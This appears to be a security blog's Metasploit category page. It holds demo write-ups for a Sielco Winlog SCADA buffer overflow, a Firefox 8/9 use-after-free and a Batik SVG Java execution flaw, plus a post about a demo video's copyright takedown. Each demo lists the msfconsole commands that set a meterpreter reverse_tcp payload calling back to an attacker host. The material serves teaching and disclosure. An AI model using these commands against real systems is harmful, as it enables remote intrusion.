Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Scada Sielco Sistemi Winlog Buffer Overflow 2.07.14 Metasploit Demo

Timeline :

Vulnerability discovered by m-1-k-3 the 2012-06-03
Public release of the vulnerability the 2012-06-04
Metasploit PoC provided the 2012-06-07

PoC provided by :

m-1-k-3

Reference(s) :

EBD-ID-18986
BID-53811

Affected version(s) :

Sielco Sistem Winlog before or equal to version 2.07.14

Tested on Windows XP Pro SP3 with :

Sielco Sistem Winlog 2.07.14

Description :

This module exploits a buffer overflow in Sielco Sistem Winlog before or equal to version 2.07.14. When sending a specially formatted packet to the Runtime.exe service on port 46824, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/scada/winlog_runtime_2
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 46824 192.168.178.22

exploit

getuid
sysinfo

CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI the 2011-12-06
Coordinated public release of the vulnerability the 2011-12-20
Metasploit PoC provided the 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3659
OSVDB-78736
MFSA-2012-04

Affected version(s) :

Mozilla Firefox before version 10.0
Mozilla Firefox before version 3.6.26
Mozilla Thunderbird before version 10.0
Mozilla Thunderbird before version 3.1.18
Mozilla SeaMonkey before version 2.7

Tested on Windows XP Pro SP3 with :

Mozilla Firefox version 9.0.1

Description :

This metasploit module is quiet unstable and exploitation is random.

This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.

Commands :

use exploit/windows/browser/mozilla_attribchildremoved
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

Squiggle 1.7 SVG Browser Java Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Nicolas Gregoire
Details of the vulnerability provided by Nicolas Gregoire the 2012-05-11
Metasploit PoC provided the 2012-05-17

PoC provided by :

Nicolas Gregoire
sinn3r
juan vazquez

Reference(s) :

http://www.agarri.fr/blog/

Affected version(s) :

Squiggle Browser 1.7
Batik framework 1.7

Tested on Mac OS X 10.7.1 with :

Squiggle Browser 1.7

Description :

This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted svg file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) It must support at least SVG version 1.1 or newer, (2) It must support Java code and (3) The “Enforce secure scripting” check must be disabled. The module has been tested against Windows and Linux platforms.

Commands :

use exploit/multi/misc/batik_svg_java
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

Metasploit Digital Music Pad SEH overflow demo censored as copyright infringement

Yesterday I received an email from YouTube notifying me that the Metasploit video demonstration of Digital Music Pad SEH overflow (EDB-ID-15134) has been removed for copyright infringement.

YouTube has disable the video as a result of a third-party notification from E-Soft.co.uk, the vendor of Digital Music Pad.

The video, I recorded in February 2011, was a demonstration of “exploit/windows/fileformat/digital_music_pad_pls” Metasploit exploitation module. This module was developed by Abhishek Lyall in October 2010.

When I recorded the vulnerability exploitation demonstration the affected software was freely downloadable from the vendor web site and no sound or other materials submitted to copyrights were supporting the video.

My videos, available on my YouTube channel, are made for educational purposes, helping security researchers to understand on how to use Metasploit modules or other exploits and warning consumers on products vulnerabilities. If you search “Digital Music Pad” on Google, you can find an uncensored copy of my video demonstration and this video is also available on SecurityTube.

Many legal cases exists regarding vulnerabilities disclosures, all of them are reported on Attrition.org legal threats against security researchers.

I really don’t understand why the Metasploit Digital Music Pad SEH overflow demo was removed and for what reason, and why E-Soft.co.uk asked YouTube to remove my video. So I will contact Attrition and submit them this case cause it is really seemed to be an abuse of copyright usage.

Also this case could be a dangerous precedent for other security researchers how are publishing demonstration videos on YouTube.

Actually I’m no more able to submit new videos on YouTube or modify any parameters of my channel, cause I’m considered as a criminal and I’m forced to watch a stupid “YouTube Copyright School” and forced to fill full a form with stupid questions regarding copyrights.

Update 1 : 18/05 at 12:47. First contact with Attrition.org in order to submit them a new case of legal threat.

Update 2 : 18/05 at 14:38. I have finally recover my YouTube account after responding to the YouTube Copyright School questions. Funny stuff the form submission wasn’t compatible with Google Chrome, so I had to switch to Safari in order to submit my answers and recover my YouTube account #fail

Update 3 : 18/05 at 15:23. Seem that I can no more select Creative Commons license for my new videos on YouTube, forced to use YouTube standard license. #fail

Update 4 : 27/05 at 11:07. After some days in Hamburg Germany, I send an email to E-Soft.co.uk in order to know the reason of the “copyright infringement”.

Update 5 : 28/05 at 11:01. After some discussions with Attrition. We have discover the reason submitted from E-Soft.co.uk to YouTube. “Software: “Digital Music Pad” *Software interface is shown *Enables illegal copying of the software“.